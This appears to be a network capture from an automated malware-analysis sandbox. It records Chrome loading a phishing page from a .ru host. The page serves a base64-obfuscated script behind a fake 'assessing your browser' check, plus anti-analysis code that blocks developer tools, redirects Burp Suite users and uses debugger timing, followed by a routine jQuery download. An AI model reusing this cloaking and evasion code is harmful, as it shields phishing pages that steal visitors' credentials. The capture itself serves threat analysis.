                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xdcQFPAIIEVp53xtsTHTE4Vo1bsdah5wBN1xs07lQUDz63BptKaYRGglrXIS2oH%2B2HeLomRMIEvhre5hyrv30Yqjjd%2Frop5oIZ%2Fmu68trqcCmUqSc0Jhep06QOECLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1536&min_rtt=1523&rtt_var=455&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1573&delivery_rate=1781057&cwnd=251&unsent_bytes=0&cid=1b017e1d378545e3&ts=144&x=0"
                                                                            Set-Cookie: XSRF-TOKEN=eyJpdiI6IjE5eGdvL0E3UjNaY2RvbzNNSHFIb0E9PSIsInZhbHVlIjoiUE0rdlFSOXUrOVRscWRYQ3ZmdDlmYkJZUzM0UU9ERUMybzZEOVVKbVZaUllkV0JQOXN2TVpjemN4bHVUbTVBMitmdkdLSmErUHU5bVEzczFGWkxiV25aSG9WUDVpSU96YTNIbEI3SlVvSUtmL2tMOC9BUnJsMjRTNW9MakduMEkiLCJtYWMiOiJmY2EzMzdjNmEyZjEzOWVkZmE0OGE0ZTgyYzFlYmNjNGE3MTEwNmQ2NzE4OWQ3YmUwYmRkZjAwNmUyMTNlZTdkIiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 16:36:14 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                            2024-12-19 14:36:14 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 70 4d 64 33 56 69 59 69 39 69 55 44 59 30 54 57 35 46 56 44 46 51 64 33 55 34 5a 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 56 47 64 6e 55 6e 46 61 65 45 55 33 52 33 46 79 4e 33 63 35 53 47 39 6d 61 6d 31 78 4e 32 52 5a 4e 45 52 4e 61 45 31 42 51 6a 64 71 51 6a 68 46 64 6d 39 32 4e 31 6c 56 62 7a 49 30 62 57 52 57 54 48 56 34 51 6d 56 33 65 57 64 4d 56 56 59 31 57 57 46 73 63 45 56 72 57 47 68 30 4d 32 46 30 4d 45 70 69 59 6c 68 55 65 6e 5a 79 63 6b 63 7a 61 6e 56 6c 51 56 6f 78 4d 56 42 6e 52 56 46 6d 56 6a 5a 33 59 7a 52 35 63 58 4a 79 4d 56 68 52 4d 47 59 30 62 48 56 73 63 33 4e 53 52 44 46 42 54 48 59 35 65 57 35 58 62 54 6b
                                                                            Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkpMd3ViYi9iUDY0TW5FVDFQd3U4Z3c9PSIsInZhbHVlIjoiVGdnUnFaeEU3R3FyN3c5SG9mam1xN2RZNERNaE1BQjdqQjhFdm92N1lVbzI0bWRWTHV4QmV3eWdMVVY1WWFscEVrWGh0M2F0MEpiYlhUenZyckczanVlQVoxMVBnRVFmVjZ3YzR5cXJyMVhRMGY0bHVsc3NSRDFBTHY5eW5XbTk
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 34 64 37 32 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 69 6e 20 77 68 61 74 20 79 6f 75 20 68 61 76 65 2c 20 62 75 74 20 77 68 6f 20 79 6f 75 20 61 72 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 48 55 79 35 78 64 57 46 75 64 48 56 74 5a 47 68 31 59 69 35 79 64 53 39 49 57 44 68 6f 61 55 78 51 59 57 52 68 65 6a 46 4f 4e 31 64 79 62 48 52 77 55 47 70 49 5a 7a 4d 30 63 56 38 79 51 7a 6b 34 61 57 63 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52
                                                                            Data Ascii: 4d72<script>/* Success is not in what you have, but who you are. */if(atob("aHR0cHM6Ly9HUy5xdWFudHVtZGh1Yi5ydS9IWDhoaUxQYWRhejFON1dybHRwUGpIZzM0cV8yQzk4aWcv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHR
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 39 68 56 31 4a 50 62 45 4e 57 63 30 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 59 77 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68
                                                                            Data Ascii: G9tOjFyZW07fQ0KI09hV1JPbENWc0ouY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTYwcHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21h
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a
                                                                            Data Ascii: EyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZ
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 51 65 6d 46 6f 59 6e 70 31 63 6e 6c 6c 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 51 65 6d 46 6f 59 6e 70 31 63 6e 6c 6c 49 43 30 67 64 6c 4a 6b 57 45 31 54 63 6b 4e 42 65 69 41 2b 49 47 5a 32 59 32 6c 6a 62 47 56 5a 65 55 4d 67 4a 69 59 67 49 58 70 4f 65 55 5a 79 56 33 56 56 55 46 45 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 39 61 51 6c 56 4b 57 6c 52 56 55 6d 49 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 65 6b 35 35 52 6e 4a 58 64 56 56 51 55 53 41 39 49 48 52 79 64 57
                                                                            Data Ascii: gICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBQemFoYnp1cnllID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChQemFoYnp1cnllIC0gdlJkWE1TckNBeiA+IGZ2Y2ljbGVZeUMgJiYgIXpOeUZyV3VVUFEpIHsNCiAgICAgICAgICAgIG9aQlVKWlRVUmIgPSB0cnVlOw0KICAgICAgICAgICAgek55RnJXdVVQUSA9IHRydW
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 56 6c 64 53 61 32 78 30 62 47 70 45 62 69 49 2b 44 51 70 55 61 47 6c 7a 49 48 42 68 5a 32 55 67 61 58 4d 67 59 58 4e 7a 5a 58 4e 7a 61 57 35 6e 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 42 6d 62 33 49 67 59 53 42 7a 59 57 5a 6c 49 47 56 34 63 47 56 79 61 57 56 75 59 32 55 75 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 6d 39 79 62 54 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52
                                                                            Data Ascii: dGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iVldSa2x0bGpEbiI+DQpUaGlzIHBhZ2UgaXMgYXNzZXNzaW5nIHlvdXIgYnJvd3NlciBmb3IgYSBzYWZlIGV4cGVyaWVuY2UuDQo8L2Rpdj4NCjwvZm9ybT4NCjwvZGl2Pg0KPC9kaXY+DQo8L2R
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 51 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 63 6d 56 7a 63 47 39 75 63 32 55 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 63 6d 56 7a 63 47 39 75 63 32 55 75 61 6e 4e 76 62 69 67 70 4f 77 30 4b 49 43 41 67 49 48 30 70 4c 6e 52 6f 5a 57 34 6f 5a 47 46 30 59 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 52 68 64 47 46 62 4a 33 4e 30 59 58 52 31 63 79 64 64 49 44 30 39 49 43 64 7a 64 57 4e 6a 5a 58 4e 7a 4a 79 6c 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 4b 47 39 61 51 6c 56 4b 57 6c 52 56 55 6d 49 67 50 54 30 67 5a 6d 46 73 63 32 55 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 73 62 32 4e 68 64 47 6c 76 62 69 35 79 5a 57 78 76 59 57 51 6f 4b 54 73 4e 43 69 41 67
                                                                            Data Ascii: Q0KICAgIH0pLnRoZW4ocmVzcG9uc2UgPT4gew0KICAgICAgICByZXR1cm4gcmVzcG9uc2UuanNvbigpOw0KICAgIH0pLnRoZW4oZGF0YSA9PiB7DQogICAgICAgIGlmKGRhdGFbJ3N0YXR1cyddID09ICdzdWNjZXNzJyl7DQogICAgICAgIGlmKG9aQlVKWlRVUmIgPT0gZmFsc2Upew0KICAgICAgICBsb2NhdGlvbi5yZWxvYWQoKTsNCiAg
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 64 5a 20 3d 20 4a 59 6b 63 79 65 53 65 6a 53 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 6f 52 71 62 71 43 59 65 4f 4e 20 3f 20 4a 59 6b 63 79 65 53 65 6a 53 2e 68 6f 73 74 6e 61 6d 65 20 3a 20 4a 59 6b 63 79 65 53 65 6a 53 2e 68 6f 73 74 6e 61 6d 65 2e 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 75 53 53 68 46 4c 6f 45 64 5a 20 3d 3d 20 6f 52 71 62 71 43 59 65 4f 4e 29 7b 0d 0a 63 6f 6e 73 74 20 4b 78 52 41 4c 41 41 4a 4b 43 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4a 59 6b 63 79 65 53 65 6a 53 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64
                                                                            Data Ascii: dZ = JYkcyeSejS.hostname === oRqbqCYeON ? JYkcyeSejS.hostname : JYkcyeSejS.hostname.split('.').slice(-2).join('.');if(uSShFLoEdZ == oRqbqCYeON){const KxRALAAJKC = window.location.pathname.split('%23')[0].split('%3F')[0];if (JYkcyeSejS.pathname.end
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 5a 32 68 30 4f 6a 55 77 4d 44 74 73 61 57 35 6c 4c 57 68 6c 61 57 64 6f 64 44 6f 78 4c 6a 49 37 66 51 30 4b 49 30 39 68 56 31 4a 50 62 45 4e 57 63 30 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 39 68 56 31 4a 50 62 45 4e 57 63 30 6f 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 54 32 46 58 55 6b 39 73 51 31 5a 7a 53 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 39 68 56 31 4a 50 62 45 4e 57 63 30 6f
                                                                            Data Ascii: Z2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI09hV1JPbENWc0ogaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI09hV1JPbENWc0ogaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojT2FXUk9sQ1ZzSiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI09hV1JPbENWc0o
                                                                            2024-12-19 14:36:14 UTC1369INData Raw: 47 35 68 64 6d 6c 6e 59 58 52 76 63 69 35 31 63 32 56 79 51 57 64 6c 62 6e 51 75 61 57 35 6a 62 48 56 6b 5a 58 4d 6f 49 6b 4a 31 63 6e 41 69 4b 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77
                                                                            Data Ascii: G5hdmlnYXRvci51c2VyQWdlbnQuaW5jbHVkZXMoIkJ1cnAiKSkgew0KICAgICAgICB3aW5kb3cubG9jYXRpb24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5w


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.1749715151.101.2.1374436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:16 UTC623OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                            Host: code.jquery.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: no-cors
                                                                            Sec-Fetch-Dest: script
                                                                            Referer: https://gs.quantumdhub.ru/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:16 UTC611INHTTP/1.1 200 OK
                                                                            Connection: close
                                                                            Content-Length: 89501
                                                                            Server: nginx
                                                                            Content-Type: application/javascript; charset=utf-8
                                                                            Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                            ETag: "28feccc0-15d9d"
                                                                            Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                            Access-Control-Allow-Origin: *
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                            Accept-Ranges: bytes
                                                                            Date: Thu, 19 Dec 2024 14:36:16 GMT
                                                                            Age: 3140509
                                                                            X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890051-NYC
                                                                            X-Cache: HIT, HIT
                                                                            X-Cache-Hits: 55, 3
                                                                            X-Timer: S1734618977.672327,VS0,VE0
                                                                            Vary: Accept-Encoding
                                                                            2024-12-19 14:36:16 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                            2024-12-19 14:36:17 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                            2024-12-19 14:36:17 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                            2024-12-19 14:36:17 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                            2024-12-19 14:36:17 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                            2024-12-19 14:36:17 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                            Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
